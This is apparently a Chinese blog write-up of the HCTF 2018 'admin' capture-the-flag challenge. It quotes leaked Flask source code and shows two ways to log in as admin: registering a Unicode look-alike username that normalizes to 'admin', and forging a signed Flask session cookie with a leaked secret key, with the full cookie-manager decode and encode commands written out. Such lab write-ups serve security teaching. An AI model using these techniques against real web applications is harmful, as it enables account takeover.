HCTF 2018 admin

0x00

题目类型:unicode欺骗,源码泄露,session伪造,条件竞争(Maybe)。

0x01

题目索引界面有登录与注册两个功能,查看源码注释中有you are not admin字样,可能要求以admin身份登陆。先注册一个账号,看看有没有有用的信息。

在改密码的界面发现源码泄漏,去github看源码。源码较长,截取关键部分。

@app.route('/register', methods = ['GET', 'POST'])
def register():

    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = RegisterForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        if session.get('image').lower() != form.verify_code.data.lower():
            flash('Wrong verify code.')
            return render_template('register.html', title = 'register', form=form)
        if User.query.filter_by(username = name).first():
            flash('The username has been registered')
            return redirect(url_for('register'))
        user = User(username=name)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('register successful')
        return redirect(url_for('login'))
    return render_template('register.html', title = 'register', form = form)

@app.route('/change', methods = ['GET', 'POST'])
def change():
    if not current_user.is_authenticated:
        return redirect(url_for('login'))
    form = NewpasswordForm()
    if request.method == 'POST':
        name = strlower(session['name'])
        user = User.query.filter_by(username=name).first()
        user.set_password(form.newpassword.data)
        db.session.commit()
        flash('change successful')
        return redirect(url_for('index'))
    return render_template('change.html', title = 'change', form = form)

@app.errorhandler(404)
def page_not_found(error):
    title = unicode(error)
    message = error.description
    return render_template('errors.html', title=title, message=message)

def strlower(username):
    username = nodeprep.prepare(username)
    return username

在注册与改密码两条路由下,发现都对用户名经过了strlower()函数处理,不过python有内置的lower函数,这里可能有问题。发现使用了nodeprep.prepare这个库,这个库的老版本是有一些问题的,比如unicode编码的“ᴬ”经过strlower后会被转义为标准的“A”,而后改密码时再进行strlower操作时,会被转变为“a”,这样就可以使用“admin”身份登陆了。同时发现session中没有特殊处理,可以伪造,稍后再详细分析。

0x02

Unicode欺骗:

注册一个名为“ᴬdmin”的账号,登陆进去修改密码,然后直接以admin身份登陆拿到flag。

tips:https://unicode-table.com/en/#1D2Cunicode编码在这个网站可查。

session伪造:

首先了解一点flask的知识,flask的session存储在客户端中,用burp抓包的话可以发现session直接出现在了http头中,并且session只做了签名处理但没有加密。这意味着我们可以读取session信息,如果知道密钥的话还可以伪造session。恰巧在github的config.py源码中,可以找到密钥。

在github上下载flask-cookie-session-manager这个脚本,首先解密session。

py .\flask_session_cookie_manager3.py -s "ckj123" -c ".eJw9UMGKg0AM_ZUlZw91rBehBxetbGFGLLaSXIpbrTqjXdCWLlP67xtd6OGRR154L8kTTpexnloIbuO9duDUVRA84eMbAlARGZXED9R7Qwk-SFcdRUetoqqlIfNUcfAxp04J6qTY9pg3Pg5SyDxbSY0iLTKBed9THnvK7nu0oUUR-2mS-VIoTcORNbRov9aoyaBtXGRPdvAokS5a0jLfGdShIL3VpGNXih33wrW0xmM80uJosMANvBw4T-PldPsx9fV9whIffc4xHHH2eZUVR_zyykZZ5rbxuYr5rLRQPBtaGW4Wu24om_rtVNpWHLJ_5VoOLMB9qscZ4Cx0eR24Lrz-ADhrbeA.Xwqjfw.0C9xgDXHd6DtNUBvcBG4JqJsu9Y"
#这是解密语法
{'_fresh': True, '_id': b'46d4a0b4ddf0f7bd5c47afd75e9a6b7fb3aea89bc61442669d6a9ee1774ec03ca98d93ccfeee63c28b6dc85ae93c7dc5c6c12db06f1cf153bc1083973909edaf', 'csrf_token': b'a9ed0ee68b79e14ae17fd714c89716d5c9ced030', 'image': b'k8vQ', 'name': 'useruser', 'user_id': '11'}
#这是解密信息

然后将name改为“admin”,再用脚本生成session,burp重放即可。

py .\flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'46d4a0b4ddf0f7bd5c47afd75e9a6b7fb3aea89bc61442669d6a9ee1774ec03ca98d93ccfeee63c28b6dc85ae93c7dc5c6c12db06f1cf153bc1083973909edaf', 'csrf_token': b'a9ed0ee68b79e14ae17fd714c89716d5c9ced030', 'image': b'k8vQ', 'name': 'admin', 'user_id': '11'}"

 

©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页